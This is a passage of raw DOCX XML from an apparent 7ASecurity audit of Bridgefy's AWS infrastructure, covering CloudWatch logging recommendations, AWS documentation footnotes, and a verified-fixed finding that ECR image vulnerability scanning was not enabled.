          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> can also be beneficial for administrators and investigators. Once this is done, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>CloudWatch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>alerts should be implemented for security-related events based on logs tailored to the environment.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>These</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>should</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>reviewed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>utilize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>security-oriented</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>AWS native services to detect anomalies. Moreover, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>CloudWatch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>data protection mechanism should be implemented to mask sensitive data and audit logs as they </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>arrive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>160</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="366"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In general, all logging and monitoring settings should be adjusted depending on the threat model, compliance requirements and volume of generated data. Excessively verbose logs may increase the overall infrastructure cost significantly, however lack of appropriate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>logging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>monitoring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>decreases</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>chances</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>successful</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>threat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>detection and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>analysis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>breach.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>It</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>advised</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>review</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>improve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>logging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487626752">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>92477</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="101" name="Graphic 101"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="101" name="Graphic 101"/>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7.281665pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15689728;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape77" coordorigin="1440,146" coordsize="2880,0" path="m1440,146l4320,146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2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>154</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="53"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId235">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/AmazonS3/latest/userguide/s3-incident-response.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>155</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="60"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId236">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/../../security-overview-aws-lambda/...lambda-functions.htm</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>l</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>156</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="59"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId237">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs-logging-monitoring.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>157</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="73"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId238">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/elasticloadbalancing/.../application/load-balancer-access-logs.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>158</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId239">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/S3Export.htm</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>l</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>159</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="41"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId240">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/vpc/latest/userguide/flow-logs.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>160</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="56"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId241">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/mask-sensitive-log-data.html</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BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>monitoring configuration in the context of a potential incident response case rather</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>than just regular daily operations of the infrastructure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>161</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250021" w:id="34"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-029</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP4/5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Weaknesses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>ECR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Scanning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="FF9900"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="372"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the fix is valid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found that the Bridgefy AWS infrastructure does not currently leverage ECR vulnerability scanning to assess the security of uploaded images. The AWS Elastic Container Registry can scan for known vulnerabilities in images pushed to repositories. Early image scanning, ideally on image push, allows early detection of known vulnerabilities and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>hence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>prevents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>deploying</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>such</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>images.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>It</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>should</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>further</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>noted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that no documentation was identified relating to regular vulnerability scanning processes during this engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="370"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Vulnerability scanning can be done at earlier steps in a CI/CD pipeline, so defining it in the AWS registry can be redundant, however</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>important</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>make</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>sure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>not skipped</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>completely.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Please</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>steps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>review</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
